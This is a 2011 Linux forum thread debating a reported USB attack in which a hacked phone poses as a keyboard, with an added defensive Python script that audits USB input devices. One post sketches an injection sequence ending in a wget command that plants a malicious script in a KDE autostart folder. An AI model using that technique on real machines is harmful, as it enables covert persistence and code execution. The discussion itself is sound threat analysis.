LinuxQuestions.org
Old 01-20-2011, 01:51 PM   #1
thorn168
Member
 
Registered: Oct 2004
Location: USA
Distribution: Vector Linux 5.1 Std., Vector Linux 5.8 Std., Win2k, XP, OS X (10.4 & 10.5)
Posts: 344

Rep: Reputation: 42
Zero day USB Threat


Hi Everyone,

Just wanted to share this zero-day USB threat reported on CNET.

It is reported to affect Linux machines.

Here is the link:

http://news.cnet.com/8301-27080_3-20...CmoreStories.0
 
Old 01-20-2011, 02:07 PM   #2
jlinkels
Senior Member
 
Registered: Oct 2003
Location: Bonaire
Distribution: Debian Lenny/Squeeze/Wheezy/Sid
Posts: 3,980

Rep: Reputation: 476
Quote:
...wrote software that changes the functionality of the USB driver so that they could launch a surreptitious attack
It is not quite clear to me exactly what functionality has been added and where. Is it the USB driver of the host (= the machine to be compromised?) How would that be done?

Is it in the USB device? So if the USB device emulates a keyboard, so what? Would the risk be greater than with an arbitrary keyboard connected to a Linux computer? Does the human interface get administrator rights by magic?

To me it looks a little bit like the author has once seen a Linux computer which did not pop up a window when a USB device was connected, and based on that drew the conclusion that a dangerous situation could arise. (Like the "warning! are you sure that you want to continue..." dialog boxes in Windows protect users from doing something stupid!)

jlinkels
 
Old 01-20-2011, 02:14 PM   #3
silvyus_06
Member
 
Registered: Oct 2010
Distribution: Ubuntu 10.04 , Linux Mint Debian Edition , Microsoft Windows 7
Posts: 386

Rep: Reputation: 49
And what can we do about that?
"Oh, I know, don't use smartphones, they're too smart asses" hahaha
 
Old 01-20-2011, 02:47 PM   #4
H_TeXMeX_H
Guru
 
Registered: Oct 2005
Location: $RANDOM
Distribution: slackware64
Posts: 12,928
Blog Entries: 2

Rep: Reputation: 1266
I think they're hacking the computer using a charging phone ... this, of course, assumes that the phone was hacked. Meh, not that interesting. Why would I charge my phone with a USB port (it doesn't even have a USB port), and how would it get hacked? This is more of a phone security issue that happens to also affect computers connected to it.
 
Old 01-20-2011, 11:36 PM   #5
John VV
Guru
 
Registered: Aug 2005
Posts: 12,100

Rep: Reputation: 1583
It is turning the phone into a keyboard using a USB cable.

When one plugs in the "hacked phone" it is seen as the keyboard and NOT as the phone.
Then the "new" keyboard has root access to the system and the payload can be inserted.


But if you have physical access then this can be done by other means, so...
Ars has a review of the cnet news
http://arstechnica.com/security/news...sb-drivers.ars
 
Old 01-21-2011, 12:00 AM   #6
jschiwal
Guru
 
Registered: Aug 2001
Location: Fargo, ND
Distribution: SuSE AMD64
Posts: 15,733

Rep: Reputation: 654
John VV: Plugging in a USB keyboard device gives you a root shell?
 
Old 01-21-2011, 06:16 AM   #7
win32sux
Guru
 
Registered: Jul 2003
Location: Los Angeles
Distribution: Ubuntu
Posts: 9,870

Rep: Reputation: 371
Extremely interesting vulnerability! Thanks for the link to the article!
 
Old 01-21-2011, 10:29 AM   #8
thorn168
Member
 
Registered: Oct 2004
Location: USA
Distribution: Vector Linux 5.1 Std., Vector Linux 5.8 Std., Win2k, XP, OS X (10.4 & 10.5)
Posts: 344

Original Poster
Rep: Reputation: 42
At first blush this exploit may not seem very threatening, but if you replace the smartphone with, say, an iPod or similar USB charging device, trouble could follow. In context, who would have imagined that something like Stuxnet would be a threat, as it specifically targeted only a very specific OS running a centrifuge?
 
Old 01-21-2011, 03:54 PM   #9
jlinkels
Senior Member
 
Registered: Oct 2003
Location: Bonaire
Distribution: Debian Lenny/Squeeze/Wheezy/Sid
Posts: 3,980

Rep: Reputation: 476
But then again, how does it work, and how does it work in Linux? Like I asked before, the article is by far not specific enough. Apparently you understand it well enough to consider it a threat, so please explain.

About Stuxnet: Infection of the PLCs was done through infecting Windows PCs. Siemens (the PLC manufacturer) builds industrial equipment based on proprietary hardware, but relies fully on Windows for both development and user interface. Not even hardened or embedded Windows, but plain commercial desktop XP. Many protocols between PLCs and Windows are proprietary, and only available on Windows. I gather it to be not that difficult to infect a Windows PC and then, while there are already open connections between PCs and PLCs, to use these connections to crack the PLC. The development protocols go much further than just uploading the software, and deeply affect the running PLC both in code and data. The originality in this Stuxnet attack was that it was focused on just one installation. Not that a PLC was infected through a PC, and cracking the PLC is not that difficult. If it was really the US and Israeli governments behind this attack they had plenty of resources to develop such tools.

jlinkels
 
Old 01-21-2011, 08:34 PM   #10
win32sux
Guru
 
Registered: Jul 2003
Location: Los Angeles
Distribution: Ubuntu
Posts: 9,870

Rep: Reputation: 371
Quote:
Originally Posted by jlinkels
It is not quite clear to me exactly what functionality has been added and where. Is it the USB driver of the host (= the machine to be compromised?) How would that be done?

Is it in the USB device? So if the USB device emulates a keyboard, so what? Would the risk be greater than with an arbitrary keyboard connected to a Linux computer? Does the human interface get administrator rights by magic?

To me it looks a little bit like the author has once seen a Linux computer which did not pop up a window when a USB device was connected, and based on that drew the conclusion that a dangerous situation could arise. (Like the "warning! are you sure that you want to continue..." dialog boxes in Windows protect users from doing something stupid!)
Quote:
Originally Posted by jlinkels
But then again, how does it work, and how does it work in Linux? Like I asked before, the article is by far not specific enough. Apparently you understand it well enough to consider it a threat, so please explain.
The attack code makes the smartphone pretend to be a keyboard/mouse. This allows for really nasty stuff to be done (while the smartphone is innocently being charged/whatever), such as copying your personal documents or planting incriminating evidence on your computer. While this doesn't on its own get the bad guy privilege escalation, a root exploit can be part of the attack payload if he/she desires.

Last edited by win32sux; 01-21-2011 at 08:40 PM.
 
Old 01-22-2011, 04:55 AM   #11
cepheus11
Member
 
Registered: Nov 2010
Location: Germany
Distribution: gentoo
Posts: 50

Rep: Reputation: 15
Quote:
Originally Posted by jlinkels
But then again, how does it work, and how does it work in Linux?
I can imagine the following scenario: I use KDE. The shortcut for the "Run" dialog in KDE is Alt-F2. The autostart directory for users is ~/.kde4/Autostart. The USB stick or smartphone could register as a keyboard. Then it sends "Press Alt" - "Press F2" - "Release F2" - "Release Alt", followed by "wget --directory-prefix=~/.kde4/Autostart (URL to malicious script)" and "Enter". Next time I log in, (malicious script) is executed (details like x permissions ignored here). I can see this on the screen, if I watch.

I don't consider this a real (or new) threat for me, because someone with physical access could simply do this by hand anyway. A smartphone needs to be really hacked - not just have an app installed. I don't think the app API exposes the USB driver stack to spoof the device class.

Read the discussion thread on the arstechnica article, there are some more ideas how this could be turned into a real threat.

Last edited by cepheus11; 01-22-2011 at 05:00 AM. Reason: typo
 
Old 01-22-2011, 05:58 AM   #12
eSelix
Senior Member
 
Registered: Oct 2009
Location: Wroclaw, Poland
Distribution: Kubuntu
Posts: 1,189

Rep: Reputation: 301
Interesting. The main reason for the existence of this threat is that devices connected to a USB port are not authenticated by the user. It is a compromise between comfort (just plug and use) and security. The USB drivers should get an option to authenticate, but I don't know how one device can be distinguished from another of the same model. So for now all devices presenting themselves as a keyboard or mouse should be paused (by the driver) from accessing the computer until the user of this computer allows them to connect. In the meantime we should not connect untrusted devices.

Last edited by eSelix; 01-22-2011 at 06:00 AM.
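
Added example (not part of any post in this thread): Linux exposes each USB interface's class codes and each device's `authorized` attribute in sysfs, so the devices eSelix wants held for approval can at least be listed. This sketch reports every device offering a HID interface and marks those that bundle it with other classes; the sample tree and its product names are constructed so it runs offline.

```python
import tempfile
from pathlib import Path

HID_CLASS = "03"                                   # USB class code: Human Interface Device
HID_PROTOCOLS = {"01": "keyboard", "02": "mouse"}  # HID boot-interface protocol codes

def _read(path):  # sysfs attribute as stripped text, or None if it is absent
    try:
        return Path(path).read_text().strip()
    except OSError:
        return None

def audit_usb_input_devices(root="/sys/bus/usb/devices"):
    """Report each USB device exposing a HID interface (mixed_classes: HID plus other classes)."""
    devices = {}
    for entry in sorted(Path(root).iterdir()):
        if ":" in entry.name:                      # interface entries look like "1-2:1.0"
            devices.setdefault(entry.name.split(":")[0], []).append(
                (_read(entry / "bInterfaceClass"), _read(entry / "bInterfaceProtocol")))
    report = []
    for dev, ifaces in devices.items():
        roles = sorted({HID_PROTOCOLS.get(p, "other-hid") for c, p in ifaces if c == HID_CLASS})
        if roles:
            report.append({
                "device": dev,
                "product": _read(Path(root, dev, "product")),
                "hid_roles": roles,
                "mixed_classes": any(c != HID_CLASS for c, _ in ifaces),
                "authorized": _read(Path(root, dev, "authorized")) == "1",
            })
    return report

def build_sample_tree():
    """Constructed sysfs-like tree: keyboard, 'phone' (storage + keyboard), plain disk."""
    root = Path(tempfile.mkdtemp())
    sample = {"1-1": ("Sample Keyboard", [("03", "01")]),
              "1-2": ("Sample Phone", [("08", "50"), ("03", "01")]),
              "1-3": ("Sample Disk", [("08", "50")])}
    for dev, (product, ifaces) in sample.items():
        files = {dev: {"product": product, "authorized": "1"}}
        for n, (cls, proto) in enumerate(ifaces):
            files[f"{dev}:1.{n}"] = {"bInterfaceClass": cls, "bInterfaceProtocol": proto}
        for name, attrs in files.items():
            (root / name).mkdir()
            for attr, value in attrs.items():
                (root / name / attr).write_text(value + "\n")
    return root

if __name__ == "__main__":
    print(audit_usb_input_devices(build_sample_tree()))
```

Called with no argument it reads the live `/sys/bus/usb/devices` tree. Keyboards that do not use the boot protocol show up as `other-hid`.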
 
Old 01-22-2011, 06:54 AM   #13
jlinkels
Senior Member
 
Registered: Oct 2003
Location: Bonaire
Distribution: Debian Lenny/Squeeze/Wheezy/Sid
Posts: 3,980

Rep: Reputation: 476
Well, I still fail to see the reason for the excitement in this article. A USB device is connected to a computer and emulates a keyboard. So? It has long been known exactly what risks are imposed when one has physical access to a Linux computer. One can reboot the machine and gain root access. But that is not the case here.

What is the difference between a remote SSH connection and an emulated keyboard? What is the difference between an e-mail with malicious content which can be run with user credentials and an emulated keyboard wedging in characters using the same user credentials?

As far as I understand, this exploit does not enable the change of the USB driver present on the host (the computer to be infected), does it? It would be different if the USB device provided its own driver, which in turn is installed by the host using root credentials.

jlinkels
 
Old 01-22-2011, 08:44 AM   #14
cepheus11
Member
 
Registered: Nov 2010
Location: Germany
Distribution: gentoo
Posts: 50

Rep: Reputation: 15
Quote:
Originally Posted by jlinkels
What is the difference between a remote SSH connection and an emulated keyboard? What is the difference between an e-mail with malicious content which can be run with user credentials and an emulated keyboard wedging in characters using the same user credentials?
Active contents in e-mails/web pages are even more dangerous because they come remotely and can run completely unnoticed, but they require a security hole or user interaction.

But yes, the real-life threat level of this exploit is often exaggerated.
 
Old 01-25-2011, 03:23 PM   #15
thorn168
Member
 
Registered: Oct 2004
Location: USA
Distribution: Vector Linux 5.1 Std., Vector Linux 5.8 Std., Win2k, XP, OS X (10.4 & 10.5)
Posts: 344

Original Poster
Rep: Reputation: 42
I realized that I know how someone with bad intentions could exploit this vulnerability to do bad things, but I decline to provide this information because I do not wish to inspire those with bad intentions to "publish" a proof of concept.

Some things should just not be public knowledge.
 
  



Tags
arbitrary code, automount, usb, zero day threat

